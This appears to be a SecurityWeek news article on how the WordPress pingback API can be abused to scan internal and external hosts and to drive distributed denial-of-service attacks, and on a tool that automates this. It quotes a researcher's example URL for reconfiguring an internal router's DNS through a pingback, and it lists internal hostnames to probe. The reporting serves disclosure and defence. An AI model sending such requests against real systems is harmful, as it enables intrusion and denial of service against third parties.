CONFERENCE Cyber AI & Automation Summit - Watch Sessions
Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Application Security

Pingback Function in WordPress Vulnerable To Malicious Use, Serves As Attack Tool

A vulnerability (or unintended function) in WordPress that was dismissed six years ago as a something not worth bothering with, has been given a second glance now that the issue has been exposed to a wider audience. The problem revolves around the pingback function being used as a means to map remote hosts, which can have problematic results for organizations using blogging platform.

A vulnerability (or unintended function) in WordPress that was dismissed six years ago as a something not worth bothering with, has been given a second glance now that the issue has been exposed to a wider audience. The problem revolves around the pingback function being used as a means to map remote hosts, which can have problematic results for organizations using blogging platform.

Pingbacks are a way for a blog owner to see who is linking to their stories. Six years ago, it was discovered that the issue could be used to scan remote hosts (internal networks and those that are forward facing) by altering the pingback link.

This distributed scanning function, something that clearly wasn’t intended when pingbacks were implemented for the XMLRPC API, could lead to DDoS conditions in addition to information exposure.

The problem is that when the issue was first brought to WordPress’ attention, it was dismissed. “There are so many ways to orchestrate a DDOS, I don’t know if this is worth bothering with,” commented WordPress developer Ryan Boren at the time. 

Now, a new tool has been released that automates the pingback vulnerability.

“WordPress exposes a so called Pingback API to link to other blog posts. Using this feature you can scan other hosts on the intra- or internet via this server. You can also use this feature for some kind of distributed port scanning: You can scan a single host using multiple WordPress Blogs exposing this API,” the tool’s instructions explain.

While organizations that host their own WordPress installations are at risk, the countless servers that are owned by hosting providers are also at risk, which can be elevated given that WordPress is often featured as a one-click install for many hosting account promotions, and millions of installations have been left abandoned.

“From the tests I’ve carried out, I’ve seen that WordPress is also supporting URLs with credentials,” explains Acunetix’s Bogdan Calin.

Advertisement. Scroll to continue reading.

According to his notes, an attacker could use a URL like the one below to reconfigure the internal router.

http://admin:[email protected]/changeDNS.asp?newDNS=aaaa

“This can also be used for distributed DOS (Denial of Service) attacks. An attacker can contact a large number of blogs and ask them to pingback a target URL. All of these blogs will attack the target URL,” he adds.

Moreover, the pingback can be abused by attackers in order to guess hosts inside the internal network, i.e. URLs like http://subversion/; http://bugzilla /; or http://dev/ can be leveraged to see if these hosts exist in the internally.

Unfortunately, only a patch will resolve this issue as disabling the pingback function doesn’t work.

“These are known weaknesses with the pingback system and there are core WordPress.org developers working on counter-measures to harden against this type of abuse for future versions of WordPress,” a spokesperson from WordPress (Automattic) told SecurityWeek via email.

Written By

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Don’t miss this Live Attack demonstration to learn how hackers operate and gain the knowledge to strengthen your defenses.

Register

Join us as we share best practices for uncovering risks and determining next steps when vetting external resources, implementing solutions, and procuring post-installation support.

Register

People on the Move

Shanta Kohli has been named CMO at Sysdig.

Cloud security firm Sysdig has appointed Sergej Epp as CISO.

F5 has appointed John Maddison as Chief Product Marketing and Technology Alliances Officer.

More People On The Move

Expert Insights

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest cybersecurity news, threats, and expert insights. Unsubscribe at any time.